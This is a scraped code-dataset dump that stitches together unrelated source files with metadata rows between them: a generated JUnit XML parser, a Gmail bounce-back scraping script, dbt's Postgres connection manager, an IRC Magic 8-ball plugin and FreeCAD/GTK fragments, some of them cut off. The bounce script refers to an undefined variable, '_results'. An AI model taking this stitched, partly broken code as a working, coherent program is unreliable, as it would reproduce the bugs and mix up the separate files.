def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class system_out
class system_err(GeneratedsSuper):
"""Data that was written to standard error while the test was executed"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if system_err.subclass:
return system_err.subclass(*args_, **kwargs_)
else:
return system_err(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='system-err', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='system-err')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='system-err'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='system-err', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='system-err'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class system_err
class testsuiteType(testsuite):
"""Derived from testsuite/@name in the non-aggregated documentsStarts
at '0' for the first testsuite and is incremented by 1 for each
following testsuite"""
subclass = None
superclass = testsuite
def __init__(self, tests=None, errors=None, name=None, timestamp=None, hostname=None, time=None, failures=None, properties=None, testcase=None, system_out=None, system_err=None, id=None, package=None):
super(testsuiteType, self).__init__(tests, errors, name, timestamp, hostname, time, failures, properties, testcase, system_out, system_err, )
self.id = _cast(int, id)
self.package = _cast(None, package)
pass
def factory(*args_, **kwargs_):
if testsuiteType.subclass:
return testsuiteType.subclass(*args_, **kwargs_)
else:
return testsuiteType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_package(self): return self.package
def set_package(self, package): self.package = package
def export(self, outfile, level, namespace_='', name_='testsuiteType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuiteType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuiteType'):
super(testsuiteType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='testsuiteType')
if self.id is not None and 'id' not in already_processed:
already_processed.append('id')
outfile.write(' id="%s"' % self.gds_format_integer(self.id, input_name='id'))
if self.package is not None and 'package' not in already_processed:
already_processed.append('package')
outfile.write(' package=%s' % (self.gds_format_string(quote_attrib(self.package).encode(ExternalEncoding), input_name='package'), ))
def exportChildren(self, outfile, level, namespace_='', name_='testsuiteType', fromsubclass_=False):
super(testsuiteType, self).exportChildren(outfile, level, namespace_, name_, True)
def hasContent_(self):
if (
super(testsuiteType, self).hasContent_()
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuiteType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.id is not None and 'id' not in already_processed:
already_processed.append('id')
showIndent(outfile, level)
outfile.write('id = %d,\n' % (self.id,))
if self.package is not None and 'package' not in already_processed:
already_processed.append('package')
showIndent(outfile, level)
outfile.write('package = "%s",\n' % (self.package,))
super(testsuiteType, self).exportLiteralAttributes(outfile, level, already_processed, name_)
def exportLiteralChildren(self, outfile, level, name_):
super(testsuiteType, self).exportLiteralChildren(outfile, level, name_)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.append('id')
try:
self.id = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('package', node)
if value is not None and 'package' not in already_processed:
already_processed.append('package')
self.package = value
self.package = ' '.join(self.package.split())
super(testsuiteType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(testsuiteType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class testsuiteType
class propertiesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, property=None):
if property is None:
self.property = []
else:
self.property = property
def factory(*args_, **kwargs_):
if propertiesType.subclass:
return propertiesType.subclass(*args_, **kwargs_)
else:
return propertiesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_property(self): return self.property
def set_property(self, property): self.property = property
def add_property(self, value): self.property.append(value)
def insert_property(self, index, value): self.property[index] = value
def export(self, outfile, level, namespace_='', name_='propertiesType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='propertiesType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='propertiesType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='propertiesType', fromsubclass_=False):
for property_ in self.property:
property_.export(outfile, level, namespace_, name_='property')
def hasContent_(self):
if (
self.property
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='propertiesType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('property=[\n')
level += 1
for property_ in self.property:
showIndent(outfile, level)
outfile.write('model_.propertyType(\n')
property_.exportLiteral(outfile, level, name_='propertyType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'property':
obj_ = propertyType.factory()
obj_.build(child_)
self.property.append(obj_)
# end class propertiesType
class propertyType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, value=None):
self.name = _cast(None, name)
self.value = _cast(None, value)
pass
def factory(*args_, **kwargs_):
if propertyType.subclass:
return propertyType.subclass(*args_, **kwargs_)
else:
return propertyType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_value(self): return self.value
def set_value(self, value): self.value = value
def export(self, outfile, level, namespace_='', name_='propertyType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='propertyType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='propertyType'):
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.value is not None and 'value' not in already_processed:
already_processed.append('value')
outfile.write(' value=%s' % (self.gds_format_string(quote_attrib(self.value).encode(ExternalEncoding), input_name='value'), ))
def exportChildren(self, outfile, level, namespace_='', name_='propertyType', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='propertyType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.value is not None and 'value' not in already_processed:
already_processed.append('value')
showIndent(outfile, level)
outfile.write('value = "%s",\n' % (self.value,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('value', node)
if value is not None and 'value' not in already_processed:
already_processed.append('value')
self.value = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class propertyType
class testcaseType(GeneratedsSuper):
"""Name of the test methodFull class name for the class the test method
is in.Time taken (in seconds) to execute the test"""
subclass = None
superclass = None
def __init__(self, classname=None, name=None, time=None, error=None, failure=None):
self.classname = _cast(None, classname)
self.name = _cast(None, name)
self.time = _cast(float, time)
self.error = error
self.failure = failure
def factory(*args_, **kwargs_):
if testcaseType.subclass:
return testcaseType.subclass(*args_, **kwargs_)
else:
return testcaseType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_error(self): return self.error
def set_error(self, error): self.error = error
def get_failure(self): return self.failure
def set_failure(self, failure): self.failure = failure
def get_classname(self): return self.classname
def set_classname(self, classname): self.classname = classname
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_time(self): return self.time
def set_time(self, time): self.time = time
def export(self, outfile, level, namespace_='', name_='testcaseType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testcaseType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testcaseType'):
if self.classname is not None and 'classname' not in already_processed:
already_processed.append('classname')
outfile.write(' classname=%s' % (self.gds_format_string(quote_attrib(self.classname).encode(ExternalEncoding), input_name='classname'), ))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
outfile.write(' time="%s"' % self.gds_format_float(self.time, input_name='time'))
def exportChildren(self, outfile, level, namespace_='', name_='testcaseType', fromsubclass_=False):
if self.error is not None:
self.error.export(outfile, level, namespace_, name_='error')
if self.failure is not None:
self.failure.export(outfile, level, namespace_, name_='failure')
def hasContent_(self):
if (
self.error is not None or
self.failure is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testcaseType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.classname is not None and 'classname' not in already_processed:
already_processed.append('classname')
showIndent(outfile, level)
outfile.write('classname = "%s",\n' % (self.classname,))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
showIndent(outfile, level)
outfile.write('time = %f,\n' % (self.time,))
def exportLiteralChildren(self, outfile, level, name_):
if self.error is not None:
showIndent(outfile, level)
outfile.write('error=model_.errorType(\n')
self.error.exportLiteral(outfile, level, name_='error')
showIndent(outfile, level)
outfile.write('),\n')
if self.failure is not None:
showIndent(outfile, level)
outfile.write('failure=model_.failureType(\n')
self.failure.exportLiteral(outfile, level, name_='failure')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('classname', node)
if value is not None and 'classname' not in already_processed:
already_processed.append('classname')
self.classname = value
self.classname = ' '.join(self.classname.split())
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('time', node)
if value is not None and 'time' not in already_processed:
already_processed.append('time')
try:
self.time = float(value)
except ValueError, exp:
raise ValueError('Bad float/double attribute (time): %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'error':
obj_ = errorType.factory()
obj_.build(child_)
self.set_error(obj_)
elif nodeName_ == 'failure':
obj_ = failureType.factory()
obj_.build(child_)
self.set_failure(obj_)
# end class testcaseType
class errorType(GeneratedsSuper):
"""The error message. e.g., if a java exception is thrown, the return
value of getMessage()The type of error that occured. e.g., if a
java execption is thrown the full class name of the exception."""
subclass = None
superclass = None
def __init__(self, message=None, type_=None, valueOf_=None):
self.message = _cast(None, message)
self.type_ = _cast(None, type_)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if errorType.subclass:
return errorType.subclass(*args_, **kwargs_)
else:
return errorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_message(self): return self.message
def set_message(self, message): self.message = message
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def export(self, outfile, level, namespace_='', name_='errorType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='errorType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='errorType'):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
outfile.write(' message=%s' % (self.gds_format_string(quote_attrib(self.message).encode(ExternalEncoding), input_name='message'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='', name_='errorType', fromsubclass_=False):
pass
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='errorType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
showIndent(outfile, level)
outfile.write('message = "%s",\n' % (self.message,))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
showIndent(outfile, level)
outfile.write('type_ = "%s",\n' % (self.type_,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('message', node)
if value is not None and 'message' not in already_processed:
already_processed.append('message')
self.message = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.append('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class errorType
class failureType(GeneratedsSuper):
"""The message specified in the assertThe type of the assert."""
subclass = None
superclass = None
def __init__(self, message=None, type_=None, valueOf_=None):
self.message = _cast(None, message)
self.type_ = _cast(None, type_)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if failureType.subclass:
return failureType.subclass(*args_, **kwargs_)
else:
return failureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_message(self): return self.message
def set_message(self, message): self.message = message
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def export(self, outfile, level, namespace_='', name_='failureType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='failureType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='failureType'):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
outfile.write(' message=%s' % (self.gds_format_string(quote_attrib(self.message).encode(ExternalEncoding), input_name='message'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='', name_='failureType', fromsubclass_=False):
pass
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='failureType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
showIndent(outfile, level)
outfile.write('message = "%s",\n' % (self.message,))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
showIndent(outfile, level)
outfile.write('type_ = "%s",\n' % (self.type_,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('message', node)
if value is not None and 'message' not in already_processed:
already_processed.append('message')
self.message = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.append('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class failureType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="testsuite",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from JUnit_api import *\n\n')
sys.stdout.write('import JUnit_api as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"errorType",
"failureType",
"propertiesType",
"propertyType",
"system_err",
"system_out",
"testcaseType",
"testsuite",
"testsuiteType",
"testsuites"
]
| gpl-2.0 | 8,034,305,934,810,393,000 | 42.824417 | 205 | 0.606986 | false |
Durandaul/BounceBack_Script | prev_versions/bouncev1.py | 1 | 2827 | import imaplib
import re
import email as emlib
import json
import csv
mail = imaplib.IMAP4_SSL('imap.gmail.com')
regexMessage = b'Delivery to the following recipient failed permanently:\s{1,}.+\s'
find_bounce_back_message = re.compile(regexMessage)
regexEmail = b'.{1,}@.+'
find_email = re.compile(regexEmail)
def multipart_detector(maintype):
if maintype == 'multipart':
for part in email_message_instance.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload()
elif maintype == 'text':
return email_message_instance.get_payload()
def ok_detector(result, data):
if result == 'OK':
_data = data[0].split()
try:
rfc822 = [mail.uid('fetch', uid, '(RFC822)') for uid in _data]
print "Retrieved UIDs"
_data = [uid[1] for uid in rfc822]
return _data
except Exception as e:
print "Error Occured"
print e
def main(password):
_login = "[email protected]"
mail.login(_login,password)
mail.select("BounceBack")
_result, _data = mail.uid('search', None, "ALL")
_data = ok_detector(_result, _data)
#_sender_message = [] Fix so that it's the message and the email
_email = []
_errors, _success = 0,0
for email in _data:
_email_response = emlib.message_from_string(email[0][1])
_email_response = str(_email_response)
try:
_find_delivery_failed_message = find_bounce_back_message.search(_email_response)
_delivery_failed = str(_find_delivery_failed_message.group())
print "Found Match"
try:
_email_address = find_email.search(_delivery_failed)
_email_address = _email_address.group()
_email_address_stringified =str(_email_address)
_email_address_stringified = _email_address_stringified.strip()
print _email_address_stringified
_results.append(_email_address_stringified)
_success += 1
except AttributeError as e:
print "Couldn't find Email in string"
except AttributeError as e :
pass
if _results != None:
_results_size = len(_results)
with open('BounceBackNames.csv', 'wb') as csvfile:
output = csv.writer(csvfile, delimiter=' ')
output.writerow('Email Address:')
output.writerows(_results)
else:
print " Uh... Talk to Max I guess?"
if __name__ == '__main__':
with open('mySecret.json', 'rb') as jsonInFile:
try:
password =json.load(jsonInFile)['password']
print "Password Retrievel successful"
except Exception as e:
print e
main(password) | unlicense | -7,139,973,591,972,969,000 | 29.73913 | 92 | 0.585426 | false |
analyst-collective/dbt | plugins/postgres/dbt/adapters/postgres/connections.py | 1 | 5388 | from contextlib import contextmanager
import psycopg2
import dbt.exceptions
from dbt.adapters.base import Credentials
from dbt.adapters.sql import SQLConnectionManager
from dbt.contracts.connection import AdapterResponse
from dbt.logger import GLOBAL_LOGGER as logger
from dbt.helper_types import Port
from dataclasses import dataclass
from typing import Optional
@dataclass
class PostgresCredentials(Credentials):
host: str
user: str
port: Port
password: str # on postgres the password is mandatory
role: Optional[str] = None
search_path: Optional[str] = None
keepalives_idle: int = 0 # 0 means to use the default value
sslmode: Optional[str] = None
_ALIASES = {
'dbname': 'database',
'pass': 'password'
}
@property
def type(self):
return 'postgres'
def _connection_keys(self):
return ('host', 'port', 'user', 'database', 'schema', 'search_path',
'keepalives_idle', 'sslmode')
class PostgresConnectionManager(SQLConnectionManager):
TYPE = 'postgres'
@contextmanager
def exception_handler(self, sql):
try:
yield
except psycopg2.DatabaseError as e:
logger.debug('Postgres error: {}'.format(str(e)))
try:
self.rollback_if_open()
except psycopg2.Error:
logger.debug("Failed to release connection!")
pass
raise dbt.exceptions.DatabaseException(str(e).strip()) from e
except Exception as e:
logger.debug("Error running SQL: {}", sql)
logger.debug("Rolling back transaction.")
self.rollback_if_open()
if isinstance(e, dbt.exceptions.RuntimeException):
# during a sql query, an internal to dbt exception was raised.
# this sounds a lot like a signal handler and probably has
# useful information, so raise it without modification.
raise
raise dbt.exceptions.RuntimeException(e) from e
@classmethod
def open(cls, connection):
if connection.state == 'open':
logger.debug('Connection is already open, skipping open.')
return connection
credentials = cls.get_credentials(connection.credentials)
kwargs = {}
# we don't want to pass 0 along to connect() as postgres will try to
# call an invalid setsockopt() call (contrary to the docs).
if credentials.keepalives_idle:
kwargs['keepalives_idle'] = credentials.keepalives_idle
# psycopg2 doesn't support search_path officially,
# see https://github.com/psycopg/psycopg2/issues/465
search_path = credentials.search_path
if search_path is not None and search_path != '':
# see https://postgresql.org/docs/9.5/libpq-connect.html
kwargs['options'] = '-c search_path={}'.format(
search_path.replace(' ', '\\ '))
if credentials.sslmode:
kwargs['sslmode'] = credentials.sslmode
try:
handle = psycopg2.connect(
dbname=credentials.database,
user=credentials.user,
host=credentials.host,
password=credentials.password,
port=credentials.port,
connect_timeout=10,
**kwargs)
if credentials.role:
handle.cursor().execute('set role {}'.format(credentials.role))
connection.handle = handle
connection.state = 'open'
except psycopg2.Error as e:
logger.debug("Got an error when attempting to open a postgres "
"connection: '{}'"
.format(e))
connection.handle = None
connection.state = 'fail'
raise dbt.exceptions.FailedToConnectException(str(e))
return connection
def cancel(self, connection):
connection_name = connection.name
try:
pid = connection.handle.get_backend_pid()
except psycopg2.InterfaceError as exc:
# if the connection is already closed, not much to cancel!
if 'already closed' in str(exc):
logger.debug(
f'Connection {connection_name} was already closed'
)
return
# probably bad, re-raise it
raise
sql = "select pg_terminate_backend({})".format(pid)
logger.debug("Cancelling query '{}' ({})".format(connection_name, pid))
_, cursor = self.add_query(sql)
res = cursor.fetchone()
logger.debug("Cancel query '{}': {}".format(connection_name, res))
@classmethod
def get_credentials(cls, credentials):
return credentials
@classmethod
def get_response(cls, cursor) -> AdapterResponse:
message = str(cursor.statusmessage)
rows = cursor.rowcount
status_message_parts = message.split() if message is not None else []
status_messsage_strings = [
part
for part in status_message_parts
if not part.isdigit()
]
code = ' '.join(status_messsage_strings)
return AdapterResponse(
_message=message,
code=code,
rows_affected=rows
)
| apache-2.0 | -9,168,342,729,262,479,000 | 31.654545 | 79 | 0.591128 | false |
whermans/lurch | modules/plugins/magic8.py | 1 | 1123 | from modules.base.plugin import Plugin
import random
class Magic8Plugin(Plugin):
replies = [
'It is certain',
'It is decidely so',
'Without a doubt',
'Yes definitely',
'You may rely on it',
'As I see it, yes',
'Most likely',
'Outlook good',
'Yes',
'Signs point to yes',
'Reply hazy, try again',
'Ask again later',
'Better not tell you now',
'Cannot predict now',
'Concentrate and ask again',
'Don\'t count on it',
'My reply is no',
'My sources say no',
'Outlook not so good',
'Very doubtful'
]
def __init__(self, conn, cfg):
super(Magic8Plugin, self).__init__(conn, cfg, True)
def parse(self, message):
if "!magic8" in message:
if "?" in message:
self.message(random.choice(self.replies))
else:
self.message("That does not appear to be a question")
def tick(self):
pass
| gpl-2.0 | 2,005,214,860,410,350,800 | 27.075 | 69 | 0.479074 | false |
JonasThomas/free-cad | src/Mod/Surfaces/surfUtils/Translator.py | 1 | 2022 | #***************************************************************************
#* *
#* Copyright (c) 2011, 2012 *
#* Jose Luis Cercos Pita <[email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD, FreeCADGui, os
from PyQt4 import QtCore,QtGui
def translate(text,context="surfaces"):
"convenience function for Qt translator"
return QtGui.QApplication.translate(context, text, None,
QtGui.QApplication.UnicodeUTF8)
| lgpl-2.1 | 5,009,215,371,370,392,000 | 65.4 | 78 | 0.412957 | false |
onia/pygobject | demos/gtk-demo/demos/Icon View/iconviewbasics.py | 1 | 7312 | #!/usr/bin/env python
# -*- Mode: Python; py-indent-offset: 4 -*-
# vim: tabstop=4 shiftwidth=4 expandtab
#
# Copyright (C) 2010 Red Hat, Inc., John (J5) Palmieri <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
